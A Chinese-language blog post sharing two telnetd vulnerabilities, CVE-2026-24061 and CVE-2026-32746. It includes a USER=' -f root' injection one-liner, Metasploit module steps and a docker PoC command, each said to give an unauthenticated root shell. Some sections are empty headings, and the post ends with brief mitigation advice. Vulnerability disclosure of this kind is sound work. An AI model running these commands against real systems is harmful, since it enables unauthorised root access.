一、Telnetd零认证提取漏洞 CVE-2026-24061

1. 漏洞介绍
CVE-2026-24061是存在于GNU InetUtils telnetd服务中的远程参数注入型认证绕过漏洞,核心问题在于telnetd服务对客户端传入的USER环境变量缺乏任何过滤和校验,直接将其作为命令行参数传递给系统登录程序/usr/bin/login,进而被攻击者利用实现身份绕过。
2. 漏洞核心:未过滤的USER环境变量与login的-f参数“漏洞”
该漏洞的本质是telnetd的代码设计中缺乏对USER环境变量的输入校验,且恰好利用了/usr/bin/login程序的-f参数特性,形成“组合式漏洞”。(/usr/bin/login是类Unix系统的原生登录程序;-f参数是为系统管理员设计的预认证快捷功能,能跳过密码输入直接登录指定用户。)
当login程序接收到-f [用户名]参数时,会判定为“已完成预认证”,直接跳过密码校验步骤,以指定用户的身份启动shell会话,前提是该参数仅能由本地高权限进程传递,且对参数来源做严格校验。
3. POC
(1)攻击者注入后的login命令:USER=’ -f root’ telnet -a [目标IP] [Telnet端口,默认23],/usr/bin/login -p -h [攻击者IP] -f root
login程序收到-f root参数后,直接跳过密码校验,以root超级用户身份为攻击者分配shell会话–整个过程无需攻击者数据任何账号密码。
(2)MSF
msfconsole
use exploit/unix/telnet/gnu_telnetd_cve202624061
set RHOSTS 目标IP
set RPORT 23
run
执行成功后直接获取root shell
二、Telnetd使未认证的根RCE成为可能 CVE-2026-32746

1. 触发原理及危害
2. POC
左边是攻击机,直接输入docker run -it –rm -p 2324:2323 –privileges poc-v001-telnetd-slc bash,无需任何其他操作,在初始连接握手时就发送了poc,拿下了root权限的shell。

3. 剖析
4. 修复方法
如果没有修复方法,建议如果不必要就禁用该服务,必要时无root权限运行telnetd,在网络边界和主机防火墙层封锁23端口以限制访问,并隔离Telnet访问。
三、总结
Telnetd这两个漏洞爆出来时,还是震惊了很多人,只需要输入一行命令,就可以拿到root权限并且进行RCE,神不知鬼不觉的拿下对方的shell。
这是我今天的漏洞分享,我每天都是会分享安全时事,以及新的漏洞,大家一起加油。




